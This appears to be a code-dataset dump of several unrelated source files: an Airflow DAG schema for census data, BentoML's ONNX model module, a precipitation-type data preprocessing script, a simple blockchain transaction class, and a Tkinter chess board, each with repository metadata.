{"name": "masters_degree", "type": "float", "mode": "nullable"},
{"name": "median_age", "type": "float", "mode": "nullable"},
{"name": "median_income", "type": "float", "mode": "nullable"},
{"name": "median_rent", "type": "float", "mode": "nullable"},
{
"name": "median_year_structure_built",
"type": "float",
"mode": "nullable",
},
{
"name": "million_dollar_housing_units",
"type": "float",
"mode": "nullable",
},
{"name": "mobile_homes", "type": "float", "mode": "nullable"},
{"name": "mortgaged_housing_units", "type": "float", "mode": "nullable"},
{"name": "no_car", "type": "float", "mode": "nullable"},
{"name": "no_cars", "type": "float", "mode": "nullable"},
{"name": "nonfamily_households", "type": "float", "mode": "nullable"},
{"name": "not_hispanic_pop", "type": "float", "mode": "nullable"},
{"name": "not_in_labor_force", "type": "float", "mode": "nullable"},
{"name": "not_us_citizen_pop", "type": "float", "mode": "nullable"},
{"name": "occupation_management_arts", "type": "float", "mode": "nullable"},
{
"name": "occupation_natural_resources_construction_maintenance",
"type": "float",
"mode": "nullable",
},
{
"name": "occupation_production_transportation_material",
"type": "float",
"mode": "nullable",
},
{"name": "occupation_sales_office", "type": "float", "mode": "nullable"},
{"name": "occupation_services", "type": "float", "mode": "nullable"},
{"name": "occupied_housing_units", "type": "float", "mode": "nullable"},
{"name": "one_car", "type": "float", "mode": "nullable"},
{
"name": "one_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "one_year_more_college", "type": "float", "mode": "nullable"},
{"name": "other_race_pop", "type": "float", "mode": "nullable"},
{
"name": "owner_occupied_housing_units",
"type": "float",
"mode": "nullable",
},
{
"name": "owner_occupied_housing_units_lower_value_quartile",
"type": "float",
"mode": "nullable",
},
{
"name": "owner_occupied_housing_units_median_value",
"type": "float",
"mode": "nullable",
},
{
"name": "owner_occupied_housing_units_upper_value_quartile",
"type": "float",
"mode": "nullable",
},
{
"name": "percent_income_spent_on_rent",
"type": "float",
"mode": "nullable",
},
{"name": "pop_16_over", "type": "float", "mode": "nullable"},
{"name": "pop_25_64", "type": "float", "mode": "nullable"},
{"name": "pop_25_years_over", "type": "float", "mode": "nullable"},
{"name": "pop_5_years_over", "type": "float", "mode": "nullable"},
{
"name": "pop_determined_poverty_status",
"type": "float",
"mode": "nullable",
},
{"name": "pop_in_labor_force", "type": "float", "mode": "nullable"},
{"name": "population_1_year_and_over", "type": "float", "mode": "nullable"},
{"name": "population_3_years_over", "type": "float", "mode": "nullable"},
{"name": "poverty", "type": "float", "mode": "nullable"},
{"name": "rent_10_to_15_percent", "type": "float", "mode": "nullable"},
{"name": "rent_15_to_20_percent", "type": "float", "mode": "nullable"},
{"name": "rent_20_to_25_percent", "type": "float", "mode": "nullable"},
{"name": "rent_25_to_30_percent", "type": "float", "mode": "nullable"},
{"name": "rent_30_to_35_percent", "type": "float", "mode": "nullable"},
{"name": "rent_35_to_40_percent", "type": "float", "mode": "nullable"},
{"name": "rent_40_to_50_percent", "type": "float", "mode": "nullable"},
{"name": "rent_burden_not_computed", "type": "float", "mode": "nullable"},
{"name": "rent_over_50_percent", "type": "float", "mode": "nullable"},
{"name": "rent_under_10_percent", "type": "float", "mode": "nullable"},
{
"name": "renter_occupied_housing_units_paying_cash_median_gross_rent",
"type": "float",
"mode": "nullable",
},
{"name": "sales_office_employed", "type": "float", "mode": "nullable"},
{
"name": "some_college_and_associates_degree",
"type": "float",
"mode": "nullable",
},
{"name": "speak_only_english_at_home", "type": "float", "mode": "nullable"},
{"name": "speak_spanish_at_home", "type": "float", "mode": "nullable"},
{
"name": "speak_spanish_at_home_low_english",
"type": "float",
"mode": "nullable",
},
{"name": "three_cars", "type": "float", "mode": "nullable"},
{"name": "total_pop", "type": "float", "mode": "nullable"},
{"name": "two_cars", "type": "float", "mode": "nullable"},
{"name": "two_or_more_races_pop", "type": "float", "mode": "nullable"},
{
"name": "two_parent_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_father_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_mother_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{
"name": "two_parents_not_in_labor_force_families_with_young_children",
"type": "float",
"mode": "nullable",
},
{"name": "unemployed_pop", "type": "float", "mode": "nullable"},
{"name": "vacant_housing_units", "type": "float", "mode": "nullable"},
{
"name": "vacant_housing_units_for_rent",
"type": "float",
"mode": "nullable",
},
{
"name": "vacant_housing_units_for_sale",
"type": "float",
"mode": "nullable",
},
{"name": "walked_to_work", "type": "float", "mode": "nullable"},
{"name": "white_including_hispanic", "type": "float", "mode": "nullable"},
{"name": "white_male_45_54", "type": "float", "mode": "nullable"},
{"name": "white_male_55_64", "type": "float", "mode": "nullable"},
{"name": "white_pop", "type": "float", "mode": "nullable"},
{"name": "worked_at_home", "type": "float", "mode": "nullable"},
{"name": "workers_16_and_over", "type": "float", "mode": "nullable"},
],
)
place_2019_5yr_transform_csv >> load_place_2019_5yr_to_bq
| 61.832075
| 5,932
| 0.565225
|
4a0eb32f300b289b937194fa2307dcd6cf0f1a64
| 15,129
|
py
|
Python
|
bentoml/_internal/frameworks/onnx.py
|
nice03/BentoML
|
003bf54884c65785bf234aa23f3ff2025cd74121
|
[
"Apache-2.0"
] | null | null | null |
bentoml/_internal/frameworks/onnx.py
|
nice03/BentoML
|
003bf54884c65785bf234aa23f3ff2025cd74121
|
[
"Apache-2.0"
] | null | null | null |
bentoml/_internal/frameworks/onnx.py
|
nice03/BentoML
|
003bf54884c65785bf234aa23f3ff2025cd74121
|
[
"Apache-2.0"
] | null | null | null |
import shutil
import typing as t
import logging
from typing import TYPE_CHECKING
from simple_di import inject
from simple_di import Provide
from bentoml import Tag
from bentoml import Runner
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..types import PathType
from ..models import Model
from ..models import SAVE_NAMESPACE
from ..runner.utils import Params
from ..runner.utils import get_gpu_memory
from ..configuration.containers import BentoMLContainer
SUPPORTED_ONNX_BACKEND: t.List[str] = ["onnxruntime", "onnxruntime-gpu"]
ONNX_EXT: str = ".onnx"
try:
import onnx
import onnxruntime as ort
except ImportError:
raise MissingDependencyException(
"""\
`onnx` is required in order to use the module `bentoml.onnx`, do `pip install onnx`.
For more information, refers to https://onnx.ai/get-started.html
`onnxruntime` is also required by `bentoml.onnx`. Refer to https://onnxruntime.ai/ for
more information.
"""
)
if TYPE_CHECKING:
import numpy as np
import torch
from pandas.core.frame import DataFrame
from tensorflow.python.framework.ops import Tensor as TFTensor
from ..models import ModelStore
_ProviderType = t.List[t.Union[str, t.Tuple[str, t.Dict[str, t.Any]]]]
_GPUProviderType = t.List[
t.Tuple[
t.Literal["CUDAExecutionProvider"],
t.Union[t.Dict[str, t.Union[int, str, bool]], str],
]
]
try:
import importlib.metadata as importlib_metadata
except ImportError:
import importlib_metadata
_PACKAGE = ["onnxruntime", "onnxruntime-gpu"]
for p in _PACKAGE:
try:
_onnxruntime_version = importlib_metadata.version(p)
break
except importlib_metadata.PackageNotFoundError:
pass
_onnx_version = importlib_metadata.version("onnx")
MODULE_NAME = "bentoml.onnx"
logger = logging.getLogger(__name__)
# helper methods
def _yield_providers(
iterable: t.Sequence[t.Any],
) -> t.Generator[str, None, None]: # pragma: no cover
if isinstance(iterable, tuple):
yield iterable[0]
elif isinstance(iterable, str):
yield iterable
else:
yield from iterable
def flatten_list(lst: t.List[t.Any]) -> t.List[str]: # pragma: no cover
return [k for i in lst for k in _yield_providers(i)]
def _get_model_info(
tag: t.Union[str, Tag],
model_store: "ModelStore",
) -> t.Tuple["Model", str]:
model = model_store.get(tag)
if model.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model.info.module}, failed loading with {MODULE_NAME}."
)
model_file = model.path_of(f"{SAVE_NAMESPACE}{ONNX_EXT}")
return model, model_file
@inject
def load(
tag: Tag,
backend: t.Optional[str] = "onnxruntime",
providers: t.Optional[t.Union["_ProviderType", "_GPUProviderType"]] = None,
session_options: t.Optional["ort.SessionOptions"] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "ort.InferenceSession":
"""
Load a model from BentoML local modelstore with given name.
Args:
tag (`str`):
Tag of a saved model in BentoML local modelstore.
backend (`str`, `optional`, default to `onnxruntime`):
Different backend runtime supported by ONNX. Currently only accepted `onnxruntime`
and `onnxruntime-gpu`.
providers (`List[Union[str, t.Tuple[str, Dict[str, Any]]`, `optional`, default to `None`):
Different providers provided by users. By default BentoML will use `onnxruntime.get_available_providers()`
when loading a model.
session_options (`onnxruntime.SessionOptions`, `optional`, default to `None`):
SessionOptions per usecase. If not specified, then default to None.
model_store (`~bentoml._internal.models.store.ModelStore`, default to `BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
an instance of Onnx model from BentoML modelstore.
Examples::
""" # noqa
_, model_file = _get_model_info(tag, model_store)
if backend not in SUPPORTED_ONNX_BACKEND:
raise BentoMLException(
f"'{backend}' runtime is currently not supported for ONNXModel"
)
if providers:
if not all(i in ort.get_all_providers() for i in flatten_list(providers)):
raise BentoMLException(f"'{providers}' cannot be parsed by `onnxruntime`")
else:
providers = ort.get_available_providers()
return ort.InferenceSession(
model_file, sess_options=session_options, providers=providers # type: ignore[reportGeneralTypeIssues] # noqa: LN001
)
@inject
def save(
name: str,
model: t.Union[onnx.ModelProto, PathType],
*,
metadata: t.Union[None, t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Save a model instance to BentoML modelstore.
Args:
name (`str`):
Name for given model instance. This should pass Python identifier check.
model:
Instance of model to be saved
metadata (`t.Optional[t.Dict[str, t.Any]]`, default to `None`):
Custom metadata for given model.
model_store (`~bentoml._internal.models.store.ModelStore`, default to `BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
tag (`str` with a format `name:version`) where `name` is the defined name user
set for their models, and version will be generated by BentoML.
Examples::
""" # noqa
context: t.Dict[str, t.Any] = {
"framework_name": "onnx",
"pip_dependencies": [
f"onnx=={_onnx_version}",
f"onnxruntime=={_onnxruntime_version}",
],
}
_model = Model.create(
name,
module=MODULE_NAME,
metadata=metadata,
context=context,
)
if isinstance(model, onnx.ModelProto):
onnx.save_model(model, _model.path_of(f"{SAVE_NAMESPACE}{ONNX_EXT}"))
else:
shutil.copyfile(model, _model.path_of(f"{SAVE_NAMESPACE}{ONNX_EXT}"))
_model.save(model_store)
return _model.tag
class _ONNXRunner(Runner):
@inject
def __init__(
self,
tag: Tag,
backend: str,
gpu_device_id: int,
disable_copy_in_default_stream: bool,
providers: t.Optional["_ProviderType"],
session_options: t.Optional["ort.SessionOptions"],
name: str,
resource_quota: t.Optional[t.Dict[str, t.Any]],
batch_options: t.Optional[t.Dict[str, t.Any]],
model_store: "ModelStore",
):
if gpu_device_id != -1:
resource_quota = dict() if not resource_quota else resource_quota
if "gpus" not in resource_quota:
resource_quota["gpus"] = gpu_device_id
super().__init__(name, resource_quota, batch_options)
self._model_info, self._model_file = _get_model_info(tag, model_store)
self._model_store = model_store
self._backend = backend
if backend not in SUPPORTED_ONNX_BACKEND:
raise BentoMLException(
f"'{backend}' runtime is currently not supported for ONNXModel"
)
if providers is not None:
if not all(i in ort.get_all_providers() for i in flatten_list(providers)):
raise BentoMLException(
f"'{providers}' cannot be parsed by `onnxruntime`"
)
else:
providers = self._get_default_providers(
gpu_device_id, disable_copy_in_default_stream
)
self._providers = providers
self._session_options = self._get_default_session_options(session_options)
@staticmethod
def _get_default_providers(
gpu_device_id: int, disable_copy_in_default_stream: bool
) -> "_ProviderType":
if gpu_device_id != -1:
_, free = get_gpu_memory(gpu_device_id)
gpu_ = {
"device_id": gpu_device_id,
"arena_extend_strategy": "kNextPowerOfTwo",
"gpu_mem_limit": free,
"cudnn_conv_algo_search": "EXHAUSTIVE",
"do_copy_in_default_stream": True,
}
if disable_copy_in_default_stream:
logger.warning(
"`disable_copy_in_default_stream=True` will set `do_copy_in_default_stream=False`."
" There are race conditions and possibly better performance."
)
gpu_["do_copy_in_default_stream"] = False
providers = [
("CUDAExecutionProvider", gpu_),
"CPUExecutionProvider",
]
else:
providers = ort.get_available_providers()
return providers # type: ignore[return-value]
def _get_default_session_options(
self, session_options: t.Optional["ort.SessionOptions"]
) -> "ort.SessionOptions":
if session_options is not None:
return session_options
_session_options = ort.SessionOptions()
_session_options.execution_mode = ort.ExecutionMode.ORT_PARALLEL
_session_options.intra_op_num_threads = self.num_concurrency_per_replica
_session_options.inter_op_num_threads = self.num_concurrency_per_replica
_session_options.graph_optimization_level = (
ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED
)
return _session_options
@property
def required_models(self) -> t.List[Tag]:
return [self._model_info.tag]
@property
def num_concurrency_per_replica(self) -> int:
# TODO: support GPU threads
if self.resource_quota.on_gpu:
return 1
return int(round(self.resource_quota.cpu))
@property
def num_replica(self) -> int:
if self.resource_quota.on_gpu:
return len(self.resource_quota.gpus)
return 1
# pylint: disable=arguments-differ,attribute-defined-outside-init
def _setup(self) -> None:
self._model = load(
self._model_info.tag,
backend=self._backend,
providers=self._providers,
session_options=self._session_options,
model_store=self._model_store,
)
self._infer_func = getattr(self._model, "run")
# pylint: disable=arguments-differ
def _run_batch( # type: ignore[reportIncompatibleMethodOverride]
self,
*args: t.Union[
"np.ndarray[t.Any, np.dtype[t.Any]]",
"DataFrame",
"torch.Tensor",
"TFTensor",
],
) -> t.Any:
params = Params[
t.Union[
"torch.Tensor",
"TFTensor",
"np.ndarray[t.Any, np.dtype[t.Any]]",
"DataFrame",
]
](*args)
def _mapping(
item: t.Union[
"torch.Tensor",
"TFTensor",
"np.ndarray[t.Any, np.dtype[t.Any]]",
"DataFrame",
]
) -> t.Any:
# TODO: check if imported before actual eval
import numpy as np
import torch
import pandas as pd
import tensorflow as tf
if isinstance(item, np.ndarray):
item = item.astype(np.float32)
elif isinstance(item, pd.DataFrame):
item = item.to_numpy()
elif isinstance(item, (tf.Tensor, torch.Tensor)):
item = item.numpy()
else:
raise TypeError(
f"`_run_batch` of {self.__class__.__name__} only takes "
"`numpy.ndarray` or `pd.DataFrame` as input parameters"
)
return item
params = params.map(_mapping)
input_names = {
i.name: val for i, val in zip(self._model.get_inputs(), params.args)
}
output_names = [_.name for _ in self._model.get_outputs()]
return self._infer_func(output_names, input_names)
@inject
def load_runner(
tag: t.Union[str, Tag],
*,
backend: str = "onnxruntime",
gpu_device_id: int = -1,
disable_copy_in_default_stream: bool = False,
providers: t.Optional["_ProviderType"] = None,
session_options: t.Optional["ort.SessionOptions"] = None,
name: t.Optional[str] = None,
resource_quota: t.Optional[t.Dict[str, t.Any]] = None,
batch_options: t.Optional[t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "_ONNXRunner":
"""
Runner represents a unit of serving logic that can be scaled horizontally to
maximize throughput. `bentoml.onnx.load_runner` implements a Runner class that
wrap around an ONNX model, which optimize it for the BentoML runtime.
Args:
tag (`str`):
Model tag to retrieve model from modelstore
gpu_device_id (`int`, `optional`, default to `-1`):
GPU device ID. Currently only support CUDA.
disable_copy_in_default_stream (`bool`, `optional`, default to `False`):
Whether to do copies in the default stream or use separate streams. Refers to
https://onnxruntime.ai/docs/execution-providers/CUDA-ExecutionProvider.html#do_copy_in_default_stream
backend (`str`, `optional`, default to `onnxruntime`):
Different backend runtime supported by ONNX. Currently only accepted `onnxruntime`
and `onnxruntime-gpu`.
providers (`List[Union[str, t.Tuple[str, Dict[str, Any]]`, `optional`, default to `None`):
Different providers provided by users. By default BentoML will use `CPUExecutionProvider` when
loading a model
session_options (`onnxruntime.SessionOptions`, `optional`, default to `None`):
SessionOptions per usecase. If not specified, then default to None.
resource_quota (`t.Dict[str, t.Any]`, default to `None`):
Dictionary to configure resources allocation for runner.
batch_options (`t.Dict[str, t.Any]`, default to `None`):
Dictionary to configure batch options for runner in a service context.
model_store (`~bentoml._internal.models.store.ModelStore`, default to `BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
Runner instances for `bentoml.onnx` model
Examples::
""" # noqa
tag = Tag.from_taglike(tag)
if name is None:
name = tag.name
return _ONNXRunner(
tag=tag,
backend=backend,
gpu_device_id=gpu_device_id,
disable_copy_in_default_stream=disable_copy_in_default_stream,
providers=providers,
session_options=session_options,
name=name,
resource_quota=resource_quota,
batch_options=batch_options,
model_store=model_store,
)
| 35.348131
| 124
| 0.635468
|
4a0eb3ba254d832be2daee09e391303a5acfc4ac
| 4,073
|
py
|
Python
|
ptype/data.py
|
ai2es/ptype-physical
|
8b0cce55eb54b7c9e588206935cb42e81adc6e20
|
[
"CC0-1.0"
] | null | null | null |
ptype/data.py
|
ai2es/ptype-physical
|
8b0cce55eb54b7c9e588206935cb42e81adc6e20
|
[
"CC0-1.0"
] | null | null | null |
ptype/data.py
|
ai2es/ptype-physical
|
8b0cce55eb54b7c9e588206935cb42e81adc6e20
|
[
"CC0-1.0"
] | null | null | null |
import os
import random
import numpy as np
import pandas as pd
from tqdm import tqdm
from sklearn.preprocessing import StandardScaler, MinMaxScaler,\
OneHotEncoder, LabelEncoder
def load_ptype_data(data_path, source, train_start='20130101', train_end='20181108',
val_start='20181109', val_end='20200909',
test_start='20200910', test_end='20210501'):
"""
Load Precip Type data
Args:
data_path (str): Path to data
source (str): Precip observation source. Supports 'ASOS' or 'mPING'.
train_start (str): Train split start date (format yyyymmdd).
train_end (str): Train split end date (format yyyymmdd).
val_start (str): Valid split start date (format yyyymmdd).
val_end (str): Valid split end date (format yyyymmdd).
test_start (str): Test split start date (format yyyymmdd).
test_end (str): Test split end date (format yyyymmdd).
Returns:
Dictionary of Pandas dataframes of training / validation / test data
"""
dates = sorted([x[-16:-8] for x in os.listdir(data_path)])
data = {}
data['train'] = dates[dates.index(train_start) : dates.index(train_end) + 1]
data['val'] = dates[dates.index(val_start) : dates.index(val_end) + 1]
data['test'] = dates[dates.index(test_start) : dates.index(test_end) + 1]
for split in data.keys():
dfs = []
for date in tqdm(data[split], desc=f"{split}"):
f = f"{source}_rap_{date}.parquet"
dfs.append(pd.read_parquet(os.path.join(data_path, f)))
data[split] = pd.concat(dfs, ignore_index=True)
return data
def preprocess_data(data, input_features, output_features, scaler_type="standard", encoder_type="onehot"):
"""
Function to select features and scale data for ML
Args:
data (dictionary of dataframes for training and validation data):
input_features (list): Input features
output_feature (list): Output feature
scaler_type: Type of scaling to perform (supports "standard" and "minmax")
encoder_type: Type of encoder to perform (supports "label" and "onehot")
Returns:
Dictionary of scaled and one-hot encoded data, dictionary of scaler objects
"""
scalar_obs = {"minmax": MinMaxScaler, "standard": StandardScaler}
scalers, scaled_data = {}, {}
scalers["input"] = scalar_obs[scaler_type]()
scaled_data["train_x"] = pd.DataFrame(scalers["input"].fit_transform(data["train"][input_features]),
columns=input_features)
scaled_data["val_x"] = pd.DataFrame(scalers["input"].transform(data["val"][input_features]), columns=input_features)
scaled_data["test_x"] = pd.DataFrame(scalers["input"].transform(data["test"][input_features]), columns=input_features)
scalers["output"] = LabelEncoder()
scaled_data["train_y"] = scalers["output"].fit_transform(data['train']['precip'])
scaled_data["val_y"] = scalers["output"].transform(data['val']['precip'])
scaled_data["test_y"] = scalers["output"].transform(data['test']['precip'])
if encoder_type == "onehot":
scalers["output"] = OneHotEncoder(sparse=False)
scaled_data["train_y"] = scalers["output"].fit_transform(scaled_data["train_y"].reshape(len(scaled_data["train_y"]), 1))
scaled_data["val_y"] = scalers["output"].transform(scaled_data["val_y"].reshape(len(scaled_data["val_y"]), 1))
scaled_data["test_y"] = scalers["output"].transform(scaled_data["test_y"].reshape(len(scaled_data["test_y"]), 1))
return scaled_data, scalers
def reshape_data_1dCNN(data, base_variables=['TEMP_C', 'T_DEWPOINT_C', 'UGRD_m/s', 'VGRD_m/s'], n_levels=67):
arr = np.zeros(shape=(data.shape[0], n_levels, len(base_variables))).astype('float32')
for i, var in enumerate(base_variables):
profile_vars = [x for x in list(data.columns) if var in x]
arr[:, :, i] = data[profile_vars].values.astype('float32')
return arr
| 47.360465
| 128
| 0.656764
|
4a0eb43295e4b66b6a9ee8233f1633e4b578f9cb
| 1,059
|
py
|
Python
|
src/transaction.py
|
rajatgupta310198/BlockChain
|
03884c0e95e6504431da1e935dde28bc99c9f0c3
|
[
"MIT"
] | 2
|
2021-03-15T12:38:18.000Z
|
2021-06-16T17:44:42.000Z
|
src/transaction.py
|
rajatgupta310198/BlockChain
|
03884c0e95e6504431da1e935dde28bc99c9f0c3
|
[
"MIT"
] | null | null | null |
src/transaction.py
|
rajatgupta310198/BlockChain
|
03884c0e95e6504431da1e935dde28bc99c9f0c3
|
[
"MIT"
] | 1
|
2018-09-28T19:08:58.000Z
|
2018-09-28T19:08:58.000Z
|
"""
Transaction Class
List of Transaction objects will be added to one Block.
Author: Rajat Gupta
Email: rajat15101@iiitnr.edu.in
Time & Date: 11:28 hrs, Sat, 3rd March 2018
"""
from datetime import datetime
class Transaction(object):
''''
Transcation class will encompases single transaction in network by two client
Client in our network are not miners/verfiers
Base class for transaction, inherit it to child class and extend it for specific use.
Transaction is 3rd part of project.
'''
def __init__(self, to_, from_, qty=1, name=None):
self.to_ = to_
self.from_ = from_
self.qty = qty
self.timestamp = str(datetime.now())
self.digital_signature = None
self.name = name
def __str__(self):
return 'Candidate : ' + str(self.name) + ', Digital Signature : ' +str(self.digital_signature)
def get_who(self):
return self.from_
def get_candidate(self):
return self.name
def get_add(self):
return self.from_
| 21.18
| 103
| 0.650614
|
4a0eb445dcd04e887a1482f6782f43e2336704e1
| 11,705
|
py
|
Python
|
chess/chessboard.py
|
Asher-W/Chess
|
f5c03232596fbb0e3cdcbcf00701aaa985ddf8a6
|
[
"MIT"
] | null | null | null |
chess/chessboard.py
|
Asher-W/Chess
|
f5c03232596fbb0e3cdcbcf00701aaa985ddf8a6
|
[
"MIT"
] | null | null | null |
chess/chessboard.py
|
Asher-W/Chess
|
f5c03232596fbb0e3cdcbcf00701aaa985ddf8a6
|
[
"MIT"
] | 1
|
2021-08-01T01:24:47.000Z
|
2021-08-01T01:24:47.000Z
|
import tkinter as tk
from PIL import Image, ImageTk
import chesspieces as cp
#font details
font, text_margin = ("Veranda", 20), 5
primary_color = "tan"
secondary_color = "SpringGreen4"
class ChessBoard(tk.Canvas):
def __init__(self, root, pattern = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR"):
self.size = min(max(min(int(root.winfo_width()/8), int(root.winfo_height()/8)) * 8, 640), 1280)
self.space_width = self.size / 8
self.root = root
tk.Canvas.__init__(self, root, width = self.size, height = self.size)
self.pack()
self.kings = {
"w" : [],
"b" : []
}
self.draw()
self.start(pattern)
root.bind("<Motion>", self.hover)
self.selected = None
root.bind("<Button-1>", self.move)
def draw(self):
for x in range(8):
for y in range(8):
self.create_rectangle(x*self.space_width, y*self.space_width, (x+1)*self.space_width, (y+1)*self.space_width,
fill = secondary_color if (x % 2) - (y % 2) else primary_color)
if not x:
self.create_text(text_margin, (y*self.space_width) + text_margin, anchor = tk.NW,
fill = primary_color if y % 2 else secondary_color, font = font, text = y + 1, tags = "labels")
self.create_text((x + 1)*self.space_width - text_margin, 8*self.space_width - text_margin, anchor = tk.SE,
fill = secondary_color if x % 2 else primary_color, font = font, text = chr(x + 97), tags ="labels")
def start(self, pattern):
x,y = 0,0
self.board = [[] for i in range(8)]
for i in pattern:
if i == "/":
x = 0
y += 1
continue
if i.isnumeric():
for i in range(int(i)):
self.board[y].append("")
x += int(i) + 1
continue
i_val = ord(i)
color = "black" if i_val > 97 else "white"
i = i.lower()
if i == "p": self.board[y].append(cp.Pawn(self, (x,y), color))
if i == "r": self.board[y].append(cp.Rook(self, (x,y), color))
if i == "n": self.board[y].append(cp.Knight(self, (x,y), color))
if i == "b": self.board[y].append(cp.Bishop(self, (x,y), color))
if i == "q": self.board[y].append(cp.Queen(self, (x,y), color))
if i == "k":
self.board[y].append(cp.King(self, (x,y), color))
self.kings[color[0]].append(self.board[y][-1])
x += 1
def get_board(self):
board = ""
for y in range(8):
count = 0
for x in range(8):
if not self.board[y][x]:
count += 1
continue
else:
space = self.board[y][x]
if isinstance(space, cp.Pawn):
new_letter = "p"
if isinstance(space, cp.Rook):
new_letter = "r"
if isinstance(space, cp.Knight):
new_letter = "n"
if isinstance(space, cp.Bishop):
new_letter = "b"
if isinstance(space, cp.Queen):
new_letter = "q"
if isinstance(space, cp.King):
new_letter = "k"
if space.color == "white":
new_letter = new_letter.upper()
board = board + new_letter
if count != 0: board = board + str(count)
board = board + "/"
return board
def hover(self, e):
self.root.update()
px = self.root.winfo_pointerx() - self.winfo_rootx()
py = self.root.winfo_pointery() - self.winfo_rooty()
x, y = int(px / self.space_width), int(py / self.space_width)
self.delete("moves")
self.moves = []
if not 0 <= x <= 7 or not 0 <= y <= 7: return
margin = 10
if self.board[y][x]:
self.create_rectangle(x*self.space_width + margin, y*self.space_width + margin,
(x+1)*self.space_width - margin, (y+1)*self.space_width - margin,
tags = "moves", fill = "red")
self.moves = self.board[y][x].find_moves()
for i in self.moves:
self.create_rectangle(i[0]*self.space_width + margin, i[1]*self.space_width + margin,
(i[0]+1)*self.space_width - margin, (i[1]+1)*self.space_width - margin,
tags = "moves", fill = "green")
self.tag_raise("labels")
self.tag_raise("pieces")
def move(self, e):
self.root.update()
px = self.root.winfo_pointerx() - self.winfo_rootx()
py = self.root.winfo_pointery() - self.winfo_rooty()
x, y = int(px / self.space_width), int(py / self.space_width)
self.delete("select")
if not 0 <= x <= 7 or not 0 <= y <= 7: return
margin = 10
if self.board[y][x]:
self.create_rectangle(x*self.space_width + margin, y*self.space_width + margin,
(x+1)*self.space_width - margin, (y+1)*self.space_width - margin,
tags = "select", fill = "blue")
self.root.unbind("<Motion>")
self.root.unbind("<Button-1>")
self.root.bind("<Button-1>", self.place_piece)
self.root.bind("<Escape>", self.reset_click)
self.selected = [x, y]
self.tag_raise("labels")
self.tag_raise("pieces")
def place_piece(self, e):
self.root.update()
px = self.root.winfo_pointerx() - self.winfo_rootx()
py = self.root.winfo_pointery() - self.winfo_rooty()
x, y = int(px / self.space_width), int(py / self.space_width)
if isinstance(self.selected, list) and 0 <= x <= 7 and 0 <= y <= 7:
if [x, y] in self.moves:
if isinstance(self.board[self.selected[1]][self.selected[0]], cp.Pawn):
if 0<=y + self.board[self.selected[1]][self.selected[0]].direction<=7 and x != self.selected[0]:
if (not self.board[y][x] and isinstance(self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x], cp.Pawn)
and self.board[y][x].color != self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x].color):
self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x].delete()
self.board[y + (self.board[self.selected[1]][self.selected[0]].direction * -1)][x] = ""
self.board[self.selected[1]][self.selected[0]].moved += 1
if self.board[y][x]:self.board[y][x].delete()
self.board[y][x] = self.board[self.selected[1]][self.selected[0]]
self.board[y][x].move((x,y))
self.board[self.selected[1]][self.selected[0]] = ""
self.reset_click(e)
self.delete("moves")
self.delete("selected")
def reset_click(self, e):
self.delete("select")
self.selected = None
self.root.bind("<Motion>", self.hover)
self.root.bind("<Button-1>", self.move)
def is_occupied(self, *args):
if isinstance(args[0], list) or isinstance(args[0], set) or isinstance(args[0], tuple):
return self.board[args[0][1]][args[0][0]]
if len(args) == 1 and isinstance(args[0], int):
return self.board[int(args[0] / 8)][args[0] % 8]
elif len(args) >= 2:
if isinstance(args[0], int) and isinstance(args[1], int):
return self.board[args[1]][args[0]]
return False
def check_for_check(self, board, color):
moves = self.get_legals(board, "black" if color == "white" else "white")
for i in self.kings[color[0]]:
if i in moves: return True
def get_legals(self, board, color):
moves = []
for y in board:
for x in y:
if x:
if x.color[0] == color[0]:
for i in x.find_moves(False):
moves.append(i)
return moves
class QuickBoard(tk.Canvas):
def __init__(self, root, pattern = "rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR"):
self.size = min(max(min(int(root.winfo_width()/8), int(root.winfo_height()/8)) * 8, 640), 1280)
self.space_width = self.size / 8
self.root = root
tk.Canvas.__init__(self, root, height = self.size, width = self.size)
self.pack()
for x in range(8):
for y in range(8):
self.create_rectangle(x*self.space_width, y*self.space_width, (x+1)*self.space_width, (y+1)*self.space_width,
fill = secondary_color if (x % 2) - (y % 2) else primary_color)
if not x:
self.create_text(text_margin, (y*self.space_width) + text_margin, anchor = tk.NW,
fill = primary_color if y % 2 else secondary_color, font = font, text = y + 1, tags = "labels")
self.create_text((x + 1)*self.space_width - text_margin, 8*self.space_width - text_margin, anchor = tk.SE,
fill = "black" if x % 2 else "white", font = font, text = chr(x + 97), tags ="labels")
if pattern:
self.draw_pieces(pattern)
def draw_pieces(self, pattern):
self.root.chess_piece_images = []
self.delete("pieces")
x, y = 0, 0
self.board = [[] for i in range(8)]
for i in pattern:
if i == "/":
x= 0
y += 1
continue
if i.isnumeric():
for i in range(int(i)):
self.board[y].append("")
x += int(i) + 1
continue
i_val = ord(i)
color = "b" if i_val > 97 else "w"
i = i.lower()
if i == "p": sprite = color + "Pawn"
if i == "r": sprite = color + "Rook"
if i == "n": sprite = color + "Knight"
if i == "b": sprite = color + "Bishop"
if i == "q": sprite = color + "Queen"
if i == "k": sprite = color + "King"
image = ImageTk.PhotoImage(image = Image.open(cp.sprite_names[sprite]))
self.root.chess_piece_images.append(image)
self.create_image(x * self.space_width + int((self.space_width - 64)/2),
y * self.space_width + int((self.space_width - 64)/2), anchor = tk.NW,
image = image, tags = "pieces")
x += 1
def get_board(self):
board = ""
for y in range(8):
count = 0
